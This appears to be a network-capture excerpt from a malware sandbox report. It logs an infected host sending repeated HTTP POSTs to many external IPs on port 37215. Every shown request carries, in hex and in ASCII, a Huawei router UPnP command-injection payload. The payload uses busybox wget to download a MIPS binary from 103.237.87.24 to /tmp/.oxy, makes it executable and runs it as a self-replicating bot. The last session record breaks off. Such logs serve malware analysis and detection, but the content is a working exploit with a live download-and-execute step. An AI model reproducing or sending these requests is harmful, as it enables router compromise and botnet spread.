20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2288192.168.2.1344552157.11.155.15337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.607058048 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2289192.168.2.1352980197.152.55.4037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.607078075 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2290192.168.2.134157641.65.161.11437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.607096910 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2291192.168.2.134211435.183.52.14937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.607572079 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2292192.168.2.1339250221.154.95.17237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.608140945 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2293192.168.2.1340264157.30.160.11837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.608174086 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2294192.168.2.1345400157.63.11.10737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.608365059 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2295192.168.2.1354126197.95.42.9237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.608670950 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2296192.168.2.1338248197.12.88.11637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.608769894 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2297192.168.2.1347830166.175.247.2437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.608772993 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2298192.168.2.1351372197.221.114.3037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.621391058 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
